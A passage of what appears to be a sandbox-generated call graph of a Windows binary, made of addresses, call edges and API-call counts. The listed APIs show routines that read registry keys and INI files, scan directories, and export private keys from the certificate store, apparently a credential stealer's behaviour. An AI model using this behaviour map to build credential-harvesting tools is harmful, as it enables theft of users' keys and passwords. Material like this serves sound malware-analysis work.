40ba2a 12789->12790 12791 4018b8 LocalFree 12790->12791 12792 40ba32 12791->12792 10077 400f71 10078 400f7d 10077->10078 10081 400e8d 10078->10081 10082 400e9b 10081->10082 10091 40f9b4 10082->10091 10086 400f6c 10087 400e8d 329 API calls 10087->10086 10088 400ef2 10089 40f9ba 329 API calls 10088->10089 10090 400f28 10088->10090 10089->10090 10090->10086 10090->10087 10094 40f9c2 10091->10094 10092 400ed7 10092->10090 10177 40f9ba 10092->10177 10094->10092 10123 40f85e 86 API calls 10094->10123 10263 40e5ce 10094->10263 10267 40c1ce 10094->10267 10271 40c34e 10094->10271 10275 40e0cd 10094->10275 10279 4063cc 10094->10279 10283 40614b 10094->10283 10295 405acb 10094->10295 10329 40504b 10094->10329 10357 409dcb 10094->10357 10372 405cca 10094->10372 10410 40e449 10094->10410 10420 405e49 10094->10420 10428 409d44 10094->10428 10436 40eb43 10094->10436 10444 408c43 10094->10444 10477 4053c3 10094->10477 10504 40a1c2 10094->10504 10514 40f740 10094->10514 10540 408f4f 10094->10540 10552 40d3be 10094->10552 10574 40e8d1 10094->10574 10578 40e4b7 10094->10578 10582 40c230 10094->10582 10594 40eeae 10094->10594 10600 40aaa8 10094->10600 10608 40dc27 10094->10608 10612 408124 10094->10612 10618 40c823 10094->10618 10649 40a0a2 10094->10649 10662 40d9a1 10094->10662 10672 4069a0 10094->10672 10676 407e20 10094->10676 10682 40901f 10094->10682 10690 40c31d 10094->10690 10694 40a21c 10094->10694 10698 40cf9b 10094->10698 10708 40de9b 10094->10708 10714 40e89b 10094->10714 10718 40d796 10094->10718 10722 40a016 10094->10722 10736 406915 10094->10736 10746 404a95 10094->10746 10760 406d14 10094->10760 10764 40f093 10094->10764 10778 40b012 10094->10778 10782 409f8f 10094->10782 10790 40c98a 10094->10790 10800 407589 10094->10800 10806 409f08 10094->10806 10814 40e907 10094->10814 10840 407086 10094->10840 10882 407685 10094->10882 10892 40a257 10094->10892 10898 409e81 10094->10898 10906 407a7f 10094->10906 10926 40e5ff 10094->10926 10930 40c1ff 10094->10930 10934 4045fd 10094->10934 10960 40cb74 10094->10960 10974 40c6f0 10094->10974 10982 40cbee 10094->10982 10986 4055ed 10094->10986 11026 40c2ec 10094->11026 11030 40f86a 10094->11030 11040 40c769 10094->11040 11048 407e69 10094->11048 11058 406ce3 10094->11058 11062 40df62 10094->11062 11072 406ae0 10094->11072 11076 40735e 10094->11076 11082 40665e 10094->11082 11086 40dbde 10094->11086 11092 4069db 10094->11092 11104 40d35a 10094->11104 11114 40ca59 10094->11114 11137 405f04 10094->11137 11143 407754 10094->11143 11151 407853 10094->11151 11165 407ed1 10094->11165 11169 40c2bb 10094->11169 11173 404c51 10094->11173 11245 40240a 10094->11245 10123->10094 10180 40f9c2 10177->10180 10178 40fa88 10178->10088 10179 40240a LocalFree 10179->10180 10180->10178 10180->10179 10181 40f740 27 API calls 10180->10181 10182 40a1c2 38 API calls 10180->10182 10183 4053c3 39 API calls 10180->10183 10184 408c43 53 API calls 10180->10184 10185 40eb43 39 API calls 10180->10185 10186 409d44 85 API calls 10180->10186 10187 405e49 35 API calls 10180->10187 10188 40e449 33 API calls 10180->10188 10189 405cca 35 API calls 10180->10189 10190 409dcb 91 API calls 10180->10190 10191 40504b 39 API calls 10180->10191 10192 405acb 33 API calls 10180->10192 10193 40614b 14 API calls 10180->10193 10194 4063cc 14 API calls 10180->10194 10195 40e0cd 35 API calls 10180->10195 10196 40c34e 35 API calls 10180->10196 10197 40c1ce 35 API calls 10180->10197 10198 40e5ce 31 API calls 10180->10198 10199 408f4f 47 API calls 10180->10199 10200 404c51 30 API calls 10180->10200 10201 40e8d1 35 API calls 10180->10201 10202 407ed1 35 API calls 10180->10202 10203 407853 29 API calls 10180->10203 10204 407754 35 API calls 10180->10204 10205 40a257 35 API calls 10180->10205 10206 40ca59 40 API calls 10180->10206 10207 40d35a 31 API calls 10180->10207 10208 4069db 35 API calls 10180->10208 10209 40f85e 86 API calls 10180->10209 10210 40dbde 14 API calls 10180->10210 10211 40665e 18 API calls 10180->10211 10212 40735e 14 API calls 10180->10212 10213 406ae0 35 API calls 10180->10213 10214 40df62 35 API calls 10180->10214 10215 406ce3 14 API calls 10180->10215 10216 407e69 21 API calls 10180->10216 10217 40c769 35 API calls 10180->10217 10218 40f86a 86 API calls 10180->10218 10219 40c2ec 35 API calls 10180->10219 10220 4055ed 29 API calls 10180->10220 10221 40cbee 35 API calls 10180->10221 10222 40c6f0 35 API calls 10180->10222 10223 40cb74 39 API calls 10180->10223 10224 4045fd 44 API calls 10180->10224 10225 40c1ff 35 API calls 10180->10225 10226 40e5ff 35 API calls 10180->10226 10227 407a7f 45 API calls 10180->10227 10228 409e81 85 API calls 10180->10228 10229 405f04 35 API calls 10180->10229 10230 407685 9 API calls 10180->10230 10231 407086 37 API calls 10180->10231 10232 40e907 34 API calls 10180->10232 10233 409f08 85 API calls 10180->10233 10234 407589 14 API calls 10180->10234 10235 40c98a 38 API calls 10180->10235 10236 409f8f 85 API calls 10180->10236 10237 40b012 24 API calls 10180->10237 10238 40f093 36 API calls 10180->10238 10239 406d14 35 API calls 10180->10239 10240 404a95 18 API calls 10180->10240 10241 406915 41 API calls 10180->10241 10242 40a016 34 API calls 10180->10242 10243 40d796 14 API calls 10180->10243 10244 40e89b 35 API calls 10180->10244 10245 40de9b 14 API calls 10180->10245 10246 40cf9b 43 API calls 10180->10246 10247 40a21c 35 API calls 10180->10247 10248 40c31d 35 API calls 10180->10248 10249 40901f 35 API calls 10180->10249 10250 407e20 14 API calls 10180->10250 10251 4069a0 35 API calls 10180->10251 10252 40d9a1 35 API calls 10180->10252 10253 40a0a2 40 API calls 10180->10253 10254 40c823 41 API calls 10180->10254 10255 408124 14 API calls 10180->10255 10256 40dc27 35 API calls 10180->10256 10257 40aaa8 28 API calls 10180->10257 10258 40eeae 18 API calls 10180->10258 10259 40c230 35 API calls 10180->10259 10260 40e4b7 35 API calls 10180->10260 10261 40c2bb 35 API calls 10180->10261 10262 40d3be 13 API calls 10180->10262 10181->10180 10182->10180 10183->10180 10184->10180 10185->10180 10186->10180 10187->10180 10188->10180 10189->10180 10190->10180 10191->10180 10192->10180 10193->10180 10194->10180 10195->10180 10196->10180 10197->10180 10198->10180 10199->10180 10200->10180 10201->10180 10202->10180 10203->10180 10204->10180 10205->10180 10206->10180 10207->10180 10208->10180 10209->10180 10210->10180 10211->10180 10212->10180 10213->10180 10214->10180 10215->10180 10216->10180 10217->10180 10218->10180 10219->10180 10220->10180 10221->10180 10222->10180 10223->10180 10224->10180 10225->10180 10226->10180 10227->10180 10228->10180 10229->10180 10230->10180 10231->10180 10232->10180 10233->10180 10234->10180 10235->10180 10236->10180 10237->10180 10238->10180 10239->10180 10240->10180 10241->10180 10242->10180 10243->10180 10244->10180 10245->10180 10246->10180 10247->10180 10248->10180 10249->10180 10250->10180 10251->10180 10252->10180 10253->10180 10254->10180 10255->10180 10256->10180 10257->10180 10258->10180 10259->10180 10260->10180 10261->10180 10262->10180 10264 40e5e0 10263->10264 11249 40e566 10264->11249 10266 40e5f0 10266->10094 10268 40c1e0 10267->10268 11261 40c13d 10268->11261 10272 40c360 10271->10272 10273 40c13d 35 API calls 10272->10273 10274 40c370 10273->10274 10274->10094 10276 40e0df 10275->10276 10277 40c13d 35 API calls 10276->10277 10278 40e0ef 10277->10278 10278->10094 10280 4063de 10279->10280 11283 4061e4 RegOpenKeyA 10280->11283 10282 4063ee 10282->10094 10284 40615d 10283->10284 10285 401d71 6 API calls 10284->10285 10288 406179 10285->10288 10286 406194 10287 401d71 6 API calls 10286->10287 10291 4061ad 10287->10291 10288->10286 10289 4018b8 LocalFree 10288->10289 10289->10286 10290 4061c8 11294 405f4c RegOpenKeyA 10290->11294 10291->10290 10294 4018b8 LocalFree 10291->10294 10293 4061d5 10293->10094 10294->10290 10296 405add 10295->10296 11304 4059a4 10296->11304 11384 4015f0 10329->11384 10331 405060 GetWindowsDirectoryA 10332 40507c 10331->10332 10333 40511f 10331->10333 10332->10333 10335 401df8 5 API calls 10332->10335 10334 401eb1 7 API calls 10333->10334 10336 405126 10334->10336 10337 405098 GetPrivateProfileStringA 10335->10337 10338 405146 10336->10338 10339 401e4c 6 API calls 10336->10339 10340 4050c8 10337->10340 10341 4050d9 GetPrivateProfileStringA 10337->10341 11414 404fff 10338->11414 10343 405135 10339->10343 10344 404e73 31 API calls 10340->10344 10346 405103 10341->10346 10347 405114 10341->10347 11386 404e73 10343->11386 10344->10341 10350 404e73 31 API calls 10346->10350 10351 4018b8 LocalFree 10347->10351 10350->10347 10351->10333 10354 4018b8 LocalFree 10354->10338 10358 409de0 10357->10358 10359 401eb1 7 API calls 10358->10359 10361 409dea 10359->10361 10360 409e12 GetCurrentDirectoryA 10363 409c3c 83 API calls 10360->10363 10361->10360 10362 401e4c 6 API calls 10361->10362 10364 409df9 10362->10364 10365 409e4a 10363->10365 10367 404351 30 API calls 10364->10367 10366 409c3c 83 API calls 10365->10366 10368 409e66 SetCurrentDirectoryA 10366->10368 10369 409e0d 10367->10369 10370 409e7d 10368->10370 10371 4018b8 LocalFree 10369->10371 10370->10094 10371->10360 10373 405cdc 10372->10373 10374 401d71 6 API calls 10373->10374 10375 405cf6 10374->10375 10376 405d0e 10375->10376 10377 40406c 16 API calls 10375->10377 10378 401d71 6 API calls 10376->10378 10379 405d09 10377->10379 10380 405d25 10378->10380 10381 4018b8 LocalFree 10379->10381 10382 405d3d 10380->10382 10383 40406c 16 API calls 10380->10383 10381->10376 10384 401d71 6 API calls 10382->10384 10385 405d38 10383->10385 10386 405d54 10384->10386 10387 4018b8 LocalFree 10385->10387 10388 405d67 10386->10388 11437 405c6c 10386->11437 10387->10382 10390 401d71 6 API calls 10388->10390 10392 405d7e 10390->10392 10394 405d91 10392->10394 10396 405c6c 30 API calls 10392->10396 10395 401d71 6 API calls 10394->10395 10398 405d8c 10396->10398 10411 40e45b 10410->10411 11442 40e237 RegOpenKeyA 10411->11442 10414 40e237 11 API calls 10415 40e483 10414->10415 11475 40e380 RegOpenKeyA 10415->11475 10418 40e380 31 API calls 10419 40e4a8 10418->10419 10419->10094 10421 405e5b 10420->10421 11506 405de8 10421->11506 10424 405de8 35 API calls 10425 405e72 10424->10425 10426 405de8 35 API calls 10425->10426 10427 405e7c 10426->10427 10427->10094 10429 4015f0 10428->10429 10430 409d59 GetCurrentDirectoryA 10429->10430 10431 409c3c 83 API calls 10430->10431 10432 409d94 10431->10432 10433 409c3c 83 API calls 10432->10433 10434 409db0 SetCurrentDirectoryA 10433->10434 10435 409dc7 10434->10435 10435->10094 10437 40eb55 10436->10437 11519 40e9f9 10437->11519 10440 40e9f9 38 API calls 10441 40eb7d 10440->10441 11536 40439c 10441->11536 10445 408c55 10444->10445 11553 408c21 10445->11553 10448 408c21 49 API calls 10449 408c6c 10448->10449 10450 408c21 49 API calls 10449->10450 10451 408c76 10450->10451 10452 401d71 6 API calls 10451->10452 10453 408c8d 10452->10453 10454 408c91 10453->10454 10455 408ca5 10453->10455 11560 408961 10454->11560 10457 401d71 6 API calls 10455->10457 10458 408cbc 10457->10458 10480 4053d6 10477->10480 10478 4053e4 StrStrIA 10478->10480 10479 40541f 11684 40531a 10479->11684 10480->10478 10480->10479 10483 40242b 9 API calls 10480->10483 10490 4018b8 LocalFree 10480->10490 11718 4051e3 10480->11718 10483->10480 10484 40531a 34 API calls 10485 405433 10484->10485 10486 40531a 34 API calls 10485->10486 10488 40543d 10486->10488 10489 40531a 34 API calls 10488->10489 10491 405447 10489->10491 10490->10480 11713 405199 10491->11713 10505 40a1d4 10504->10505 10506 401d71 6 API calls 10505->10506 10507 40a1ea 10506->10507 10508 40242b 9 API calls 10507->10508 10510 40a20d 10507->10510 10509 40a1f4 10508->10509 10511 404351 30 API calls 10509->10511 10510->10094 10512 40a208 10511->10512 10513 4018b8 LocalFree 10512->10513 10513->10510 10515 40f752 10514->10515 11745 40f6ee 10515->11745 10520 401df8 5 API calls 10521 40f77f 10520->10521 11759 40f3ac RegOpenKeyA 10521->11759 10524 4018b8 LocalFree 10525 40f799 10524->10525 10526 401d71 6 API calls 10525->10526 10528 40f7af 10526->10528 10527 40f7d3 10528->10527 10529 401e4c 6 API calls 10528->10529 10541 408f61 10540->10541 10542 40439c 35 API calls 10541->10542 10543 408f7b 10542->10543 11810 408d1e RegOpenKeyA 10543->11810 10546 408d1e 14 API calls 10547 408fa0 10546->10547 11821 408e0d RegOpenKeyA 10547->11821 10550 408e0d 42 API calls 10551 408fc4 10550->10551 10551->10094 10554 40d3d2 10552->10554 10553 40d5af 10553->10094 10554->10553 10555 40d43d CertOpenSystemStoreA 10554->10555 10555->10553 10563 40d457 10555->10563 10556 40d459 CertEnumCertificatesInStore 10557 40d469 CertCloseStore 10556->10557 10556->10563 10557->10553 10559 40d487 lstrcmp 10559->10563 10561 40d4be lstrcmp 10562 40d4d3 CryptAcquireCertificatePrivateKey 10561->10562 10561->10563 10562->10563 10564 40d4f0 CryptGetUserKey 10562->10564 10563->10556 10563->10559 10563->10561 10565 4018b8 LocalFree 10563->10565 11840 4018cf LocalAlloc 10563->11840 10566 40d504 CryptExportKey 10564->10566 10567 40d57c CryptReleaseContext 10564->10567 10565->10563 10568 40d573 CryptDestroyKey 10566->10568 10569 40d51d 10566->10569 10567->10563 10568->10567 11841 4018cf LocalAlloc 10569->11841 10571 40d525 CryptExportKey 10573 40d542 10571->10573 10572 4018b8 LocalFree 10572->10568 10573->10572 10575 40e8e3 10574->10575 11842 40e85d 10575->11842 10577 40e8f8 10577->10094 10579 40e4c9 10578->10579 10580 40c13d 35 API calls 10579->10580 10581 40e4d9 10580->10581 10581->10094 10583 40c242 10582->10583 10584 40c13d 35 API calls 10583->10584 10585 40c252 10584->10585 10586 401d71 6 API calls 10585->10586 10587 40c269 10586->10587 10588 40c2ac 10587->10588 10589 4041a6 30 API calls 10587->10589 10588->10094 10590 40c28a 10589->10590 10591 4041a6 30 API calls 10590->10591 10592 40c2a4 10591->10592 10593 4018b8 LocalFree 10592->10593 10593->10588 10595 40eec0 10594->10595 11865 40eba3 RegOpenKeyA 10595->11865 10598 40eba3 18 API calls 10599 40eee8 10598->10599 10599->10094 10606 40aaba 10600->10606 10601 40aae0 11877 40a875 756FE550 10601->11877 10605 40ab15 10605->10094 10606->10601 10607 40a45e 757283B0 10606->10607 10607->10601 10609 40dc39 10608->10609 10610 40439c 35 API calls 10609->10610 10611 40dc53 10610->10611 10611->10094 10613 408136 10612->10613 11919 407f0c RegOpenKeyA 10613->11919 10616 407f0c 14 API calls 10617 40815e 10616->10617 10617->10094 10625 40c836 10618->10625 10619 40c844 StrStrIA 10619->10625 10620 40c88b 10621 40439c 35 API calls 10620->10621 10622 40c8a2 10621->10622 10624 401d71 6 API calls 10622->10624 10623 40242b 9 API calls 10623->10625 10626 40c8b9 10624->10626 10625->10619 10625->10620 10625->10623 10627 404351 30 API calls 10625->10627 10630 4018b8 LocalFree 10625->10630 10628 401d71 6 API calls 10626->10628 10627->10625 10629 40c8d3 10628->10629 10631 401d71 6 API calls 10629->10631 10630->10625 10632 40c8ed 10631->10632 10633 401d71 6 API calls 10632->10633 10636 40c909 10633->10636 10634 40c94c 10635 4018b8 LocalFree 10634->10635 10636->10634 10641 4015cb lstrlen 10636->10641 10643 40c936 10641->10643 10650 40a0b6 10649->10650 10651 401eb1 7 API calls 10650->10651 10652 40a0c0 10651->10652 10655 404351 30 API calls 10652->10655 10659 40a0dd 10652->10659 10653 40a133 10653->10094 10654 40a0ee StrStrIA 10654->10659 10656 40a0d8 10655->10656 10658 4018b8 LocalFree 10656->10658 10657 40242b 9 API calls 10657->10659 10658->10659 10659->10653 10659->10654 10659->10657 10660 404351 30 API calls 10659->10660 10661 4018b8 LocalFree 10659->10661 10660->10659 10661->10659 10663 40d9b3 10662->10663 11930 40d965 10663->11930 10666 40d965 35 API calls 10667 40d9ca 10666->10667 10668 40d965 35 API calls 10667->10668 10669 40d9d4 10668->10669 10670 40439c 35 API calls 10669->10670 10671 40d9eb 10670->10671 10671->10094 10673 4069b2 10672->10673 10674 40439c 35 API calls 10673->10674 10675 4069cc 10674->10675 10675->10094 10677 407e32 10676->10677 11939 407bba RegOpenKeyA 10677->11939 10680 407bba 14 API calls 10681 407e5a 10680->10681 10681->10094 10683 409031 10682->10683 11950 408fd3 10683->11950 10686 408fd3 35 API calls 10687 409048 10686->10687 10688 408fd3 35 API calls 10687->10688 10689 409052 10688->10689 10689->10094 10691 40c32f 10690->10691 10692 40c13d 35 API calls 10691->10692 10693 40c33f 10692->10693 10693->10094 10695 40a22e 10694->10695 10696 40439c 35 API calls 10695->10696 10697 40a248 10696->10697 10697->10094 10699 40cfad 10698->10699 11961 40ccda 10699->11961 10702 401eb1 7 API calls 10703 40cfbf 10702->10703 10704 4041a6 30 API calls 10703->10704 10705 40cfe1 10703->10705 10706 40cfdc 10704->10706 10705->10094 10707 4018b8 LocalFree 10706->10707 10707->10705 10709 40dead 10708->10709 11981 40dc62 RegOpenKeyA 10709->11981 10712 40dc62 14 API calls 10713 40ded5 10712->10713 10713->10094 10715 40e8ad 10714->10715 10716 40e85d 35 API calls 10715->10716 10717 40e8c2 10716->10717 10717->10094 10719 40d7a8 10718->10719 11992 40d5c0 RegOpenKeyA 10719->11992 10721 40d7b8 10721->10094 10723 40a028 10722->10723 10724 401d71 6 API calls 10723->10724 10725 40a042 10724->10725 10726 40a05f 10725->10726 10727 404351 30 API calls 10725->10727 10728 401d71 6 API calls 10726->10728 10729 40a05a 10727->10729 10730 40a076 10728->10730 10731 4018b8 LocalFree 10729->10731 10732 404351 30 API calls 10730->10732 10733 40a093 10730->10733 10731->10726 10734 40a08e 10732->10734 10733->10094 10735 4018b8 LocalFree 10734->10735 10735->10733 10737 406927 10736->10737 10738 40439c 35 API calls 10737->10738 10739 406941 10738->10739 10740 401d71 6 API calls 10739->10740 10744 40695a 10740->10744 10741 406984 12003 40668f RegOpenKeyA 10741->12003 10743 406991 10743->10094 10744->10741 10745 4018b8 LocalFree 10744->10745 10745->10741 10747 404aa7 10746->10747 12015 40491b RegOpenKeyA 10747->12015 10750 40491b 14 API calls 10751 404ac4 10750->10751 10752 40491b 14 API calls 10751->10752 10753 404ad1 10752->10753 12026 40480d RegOpenKeyA 10753->12026 10756 40480d 10 API calls 10757 404aeb 10756->10757 10758 40480d 10 API calls 10757->10758 10759 404af8 10758->10759 10759->10094 10761 406d26 10760->10761 10762 40439c 35 API calls 10761->10762 10763 406d40 10762->10763 10763->10094 10765 40f0a5 10764->10765 10766 40439c 35 API calls 10765->10766 10767 40f0bf 10766->10767 10768 40439c 35 API calls 10767->10768 10769 40f0d6 10768->10769 10770 40439c 35 API calls 10769->10770 10771 40f0ed 10770->10771 10772 40439c 35 API calls 10771->10772 10773 40f104 10772->10773 12035 40ef6c 10773->12035 10779 40b024 10778->10779 12076 40aed7 RegOpenKeyA 10779->12076 10781 40b034 10781->10094 10783 4015f0 10782->10783 10784 409fa4 GetCurrentDirectoryA 10783->10784 10785 409c3c 83 API calls 10784->10785 10786 409fdf 10785->10786 10787 409c3c 83 API calls 10786->10787 10788 409ffb SetCurrentDirectoryA 10787->10788 10789 40a012 10788->10789 10789->10094 10791 40c99c 10790->10791 10792 401d71 6 API calls 10791->10792 10793 40c9b2 10792->10793 10794 40242b 9 API calls 10793->10794 10795 40c9d9 10793->10795 10796 40c9bc 10794->10796 10795->10094 10796->10795 10797 404351 30 API calls 10796->10797 10798 40c9d4 10797->10798 10799 4018b8 LocalFree 10798->10799 10799->10795 10801 40759b 10800->10801 12164 4073a7 RegOpenKeyA 10801->12164 10804 4073a7 14 API calls 10805 4075c3 10804->10805 10805->10094 10807 4015f0 10806->10807 10808 409f1d GetCurrentDirectoryA 10807->10808 10809 409c3c 83 API calls 10808->10809 10810 409f58 10809->10810 10811 409c3c 83 API calls 10810->10811 10812 409f74 SetCurrentDirectoryA 10811->10812 10813 409f8b 10812->10813 10813->10094 10815 40e919 10814->10815 10816 401d71 6 API calls 10815->10816 10817 40e933 10816->10817 10818 40e950 10817->10818 10819 404351 30 API calls 10817->10819 10820 401d71 6 API calls 10818->10820 10821 40e94b 10819->10821 10822 40e966 10820->10822 10823 4018b8 LocalFree 10821->10823 10824 40e983 10822->10824 10825 404351 30 API calls 10822->10825 10823->10818 10826 401d71 6 API calls 10824->10826 10827 40e97e 10825->10827 10829 40e99a 10826->10829 10830 4018b8 LocalFree 10827->10830 10828 40e9b7 10832 401d71 6 API calls 10828->10832 10829->10828 10831 404351 30 API calls 10829->10831 10830->10824 10833 40e9b2 10831->10833 10834 40e9cd 10832->10834 10835 4018b8 LocalFree 10833->10835 10836 40e9ea 10834->10836 10837 404351 30 API calls 10834->10837 10835->10828 10836->10094 10838 40e9e5 10837->10838 10841 407098 10840->10841 12175 406d4f RegOpenKeyA 10841->12175 10844 401d71 6 API calls 10845 4070bf 10844->10845 10846 4070dd 10845->10846 10848 401e4c 6 API calls 10845->10848 10847 401eb1 7 API calls 10846->10847 10849 4070e4 10847->10849 10850 4070ce 10848->10850 10851 40710d 10849->10851 10853 401e4c 6 API calls 10849->10853 10852 406fbb 20 API calls 10850->10852 10854 401eb1 7 API calls 10851->10854 10855 4070d8 10852->10855 10856 4070f3 10853->10856 10857 407114 10854->10857 10858 4018b8 LocalFree 10855->10858 10859 401e4c 6 API calls 10856->10859 10860 40713d 10857->10860 10863 401e4c 6 API calls 10857->10863 10858->10846 10861 4070fe 10859->10861 10862 401eb1 7 API calls 10860->10862 12186 406fbb 10861->12186 10866 407144 10862->10866 10864 407123 10863->10864 10867 401e4c 6 API calls 10864->10867 10883 407697 10882->10883 12212 4075d2 RegOpenKeyA 10883->12212 10886 4075d2 9 API calls 10887 4076bf 10886->10887 10888 4075d2 9 API calls 10887->10888 10889 4076d2 10888->10889 10890 4075d2 9 API calls 10889->10890 10891 4076e4 10890->10891 10891->10094 10893 40a269 10892->10893 10894 40439c 35 API calls 10893->10894 10895 40a283 10894->10895 10896 40439c 35 API calls 10895->10896 10897 40a29a 10896->10897 10897->10094 10899 4015f0 10898->10899 10900 409e96 GetCurrentDirectoryA 10899->10900 10901 409c3c 83 API calls 10900->10901 10902 409ed1 10901->10902 10903 409c3c 83 API calls 10902->10903 10904 409eed SetCurrentDirectoryA 10903->10904 10905 409f04 10904->10905 10905->10094 10907 407a93 10906->10907 10908 407b66 10907->10908 10909 407aab StrStrA 10907->10909 10913 407ac4 lstrlen 10907->10913 10915 40242b 9 API calls 10907->10915 10919 404351 30 API calls 10907->10919 10924 4018b8 LocalFree 10907->10924 12220 407a33 10908->12220 10909->10907 10911 407b08 StrStrIA 10909->10911 10911->10907 10916 40242b 9 API calls 10913->10916 10914 407a33 35 API calls 10917 407b7a 10914->10917 10915->10907 10916->10907 10918 407a33 35 API calls 10917->10918 10920 407b84 10918->10920 10919->10907 12231 4078c8 RegOpenKeyA 10920->12231 10923 4078c8 37 API calls 10925 407ba9 10923->10925 10924->10907 10925->10094 10927 40e611 10926->10927 10928 40439c 35 API calls 10927->10928 10929 40e62b 10928->10929 10929->10094 10931 40c211 10930->10931 10932 40c13d 35 API calls 10931->10932 10933 40c221 10932->10933 10933->10094 10935 404614 10934->10935 10936 404635 GetVersionExA 10935->10936 10937 404657 10936->10937 12242 40446a GetModuleHandleA 10937->12242 10939 40469d 12248 4018cf LocalAlloc 10939->12248 10941 4046b0 GetLocaleInfoA 12249 40159f 10941->12249 10943 4046df GetLocaleInfoA 10944 404708 10943->10944 12251 4044d2 10944->12251 10961 40cb86 10960->10961 10962 401d71 6 API calls 10961->10962 10963 40cb9c 10962->10963 10964 40cba0 StrStrIA 10963->10964 10965 40cbdf 10963->10965 10966 40cbb4 10964->10966 10967 40cbd7 10964->10967 10965->10094 10968 40242b 9 API calls 10966->10968 10969 4018b8 LocalFree 10967->10969 10970 40cbbc 10968->10970 10969->10965 10971 4041a6 30 API calls 10970->10971 10972 40cbd2 10971->10972 10973 4018b8 LocalFree 10972->10973 10973->10967 10975 40c702 10974->10975 12290 40c67f 10975->12290 10978 40c67f 35 API calls 10979 40c719 10978->10979 10980 40c67f 35 API calls 10979->10980 10981 40c723 10980->10981 10981->10094 10983 40cc00 10982->10983 10984 40439c 35 API calls 10983->10984 10985 40cc1a 10984->10985 10985->10094 10987 4055ff 10986->10987 12307 4054c8 10987->12307 10990 4054c8 24 API calls 10991 405632 10990->10991 10992 4054c8 24 API calls 10991->10992 10993 40564a 10992->10993 10994 4054c8 24 API calls 10993->10994 10995 405662 10994->10995 10996 4054c8 24 API calls 10995->10996 10997 40567a 10996->10997 10998 4054c8 24 API calls 10997->10998 11027 40c2fe 11026->11027 11028 40c13d 35 API calls 11027->11028 11029 40c30e 11028->11029 11029->10094 11031 409c3c 83 API calls 11030->11031 11032 40f86f 11031->11032 11033 409c3c 83 API calls 11032->11033 11034 40f88b SetCurrentDirectoryA GetCurrentDirectoryA 11033->11034 11035 409c3c 83 API calls 11034->11035 11036 40f8cf 11035->11036 11037 409c3c 83 API calls 11036->11037 11038 40f8eb SetCurrentDirectoryA 11037->11038 11039 40f902 11038->11039 11039->10094 11041 40c77b 11040->11041 12354 40c732 11041->12354 11044 40c732 35 API calls 11045 40c792 11044->11045 11046 40c732 35 API calls 11045->11046 11047 40c79c 11046->11047 11047->10094 11049 4015f0 11048->11049 11050 407e7e GetWindowsDirectoryA 11049->11050 11051 407ec2 11050->11051 11052 407e96 11050->11052 11051->10094 11052->11051 11053 401df8 5 API calls 11052->11053 11054 407eae 11053->11054 11055 40406c 16 API calls 11054->11055 11056 407ebd 11055->11056 11057 4018b8 LocalFree 11056->11057 11057->11051 11059 406cf5 11058->11059 12363 406b1b RegOpenKeyA 11059->12363 11061 406d05 11061->10094 11063 40df74 11062->11063 11064 401d71 6 API calls 11063->11064 11065 40df8e 11064->11065 11066 40dfab 11065->11066 11067 404351 30 API calls 11065->11067 11068 40439c 35 API calls 11066->11068 11069 40dfa6 11067->11069 11070 40dfc2 11068->11070 11071 4018b8 LocalFree 11069->11071 11070->10094 11071->11066 11073 406af2 11072->11073 11074 40439c 35 API calls 11073->11074 11075 406b0c 11074->11075 11075->10094 11077 407370 11076->11077 12373 40717c RegOpenKeyA 11077->12373 11080 40717c 14 API calls 11081 407398 11080->11081 11081->10094 11083 406670 11082->11083 12384 4063fd RegOpenKeyA 11083->12384 11085 406680 11085->10094 11087 40dbf0 11086->11087 12395 40d9fa RegOpenKeyA 11087->12395 11090 40d9fa 14 API calls 11091 40dc18 11090->11091 11091->10094 11093 4069ed 11092->11093 11094 40439c 35 API calls 11093->11094 11095 406a0e 11094->11095 11096 401d71 6 API calls 11095->11096 11097 406a25 11096->11097 11098 406a4d 11097->11098 11099 401e4c 6 API calls 11097->11099 11098->10094 11100 406a34 11099->11100 11101 404351 30 API calls 11100->11101 11102 406a48 11101->11102 11103 4018b8 LocalFree 11102->11103 11103->11098 11105 40d36c 11104->11105 12406 40d072 RegOpenKeyA 11105->12406 11108 40d072 16 API calls 11109 40d394 11108->11109 12418 40d2cb 11109->12418 11112 40d2cb 21 API calls 11113 40d3af 11112->11113 11113->10094 11122 40ca6c 11114->11122 11115 40caba 11117 401eb1 7 API calls 11115->11117 11116 40ca7a StrStrIA 11116->11122 11118 40cac1 11117->11118 11120 40cae9 11118->11120 11123 401e4c 6 API calls 11118->11123 11119 40242b 9 API calls 11119->11122 11121 401eb1 7 API calls 11120->11121 11124 40caf0 11121->11124 11122->11115 11122->11116 11122->11119 11125 404351 30 API calls 11122->11125 11129 4018b8 LocalFree 11122->11129 11126 40cad0 11123->11126 11128 401e4c 6 API calls 11124->11128 11132 40cb18 11124->11132 11125->11122 11127 404351 30 API calls 11126->11127 11130 40cae4 11127->11130 11131 40caff 11128->11131 11129->11122 11133 4018b8 LocalFree 11130->11133 11134 404351 30 API calls 11131->11134 11132->10094 11133->11120 11135 40cb13 11134->11135 11136 4018b8 LocalFree 11135->11136 11136->11132 11138 405f16 11137->11138 12428 405e8b 11138->12428 11141 405e8b 35 API calls 11142 405f3d 11141->11142 11142->10094 11144 407766 11143->11144 12443 4076f3 11144->12443 11147 4076f3 35 API calls 11148 40777d 11147->11148 11149 4076f3 35 API calls 11148->11149 11150 407787 11149->11150 11150->10094 11152 407865 11151->11152 12456 407796 11152->12456 11155 407796 29 API calls 11156 407880 11155->11156 11157 407796 29 API calls 11156->11157 11158 40788c 11157->11158 11159 407796 29 API calls 11158->11159 11160 40789b 11159->11160 11161 407796 29 API calls 11160->11161 11162 4078aa 11161->11162 11163 407796 29 API calls 11162->11163 11166 407ee3 11165->11166 11167 40439c 35 API calls 11166->11167 11168 407efd 11167->11168 11168->10094 11170 40c2cd 11169->11170 11171 40c13d 35 API calls 11170->11171 11172 40c2dd 11171->11172 11172->10094 11174 404c63 11173->11174 12487 4018cf LocalAlloc 11174->12487 11176 404c70 GetWindowsDirectoryA 11177 404c84 11176->11177 11178 404c98 11176->11178 11177->11178 11180 404c8b 11177->11180 11179 4018b8 LocalFree 11178->11179 11181 404c96 11179->11181 12488 404b1e 11180->12488 11183 401eb1 7 API calls 11181->11183 11184 404ca7 11183->11184 11185 404b1e 28 API calls 11184->11185 11186 404cb0 11185->11186 11187 401eb1 7 API calls 11186->11187 11188 404cb7 11187->11188 11189 404ccf 11188->11189 11190 401e4c 6 API calls 11188->11190 11191 401eb1 7 API calls 11189->11191 11192 404cc6 11190->11192 11246 402413 11245->11246 11247 40241f 11246->11247 11248 4018b8 LocalFree 11246->11248 11247->10094 11248->11246 11250 40e575 11249->11250 11251 40e579 11249->11251 11250->10266 11260 4018cf LocalAlloc 11251->11260 11253 40e583 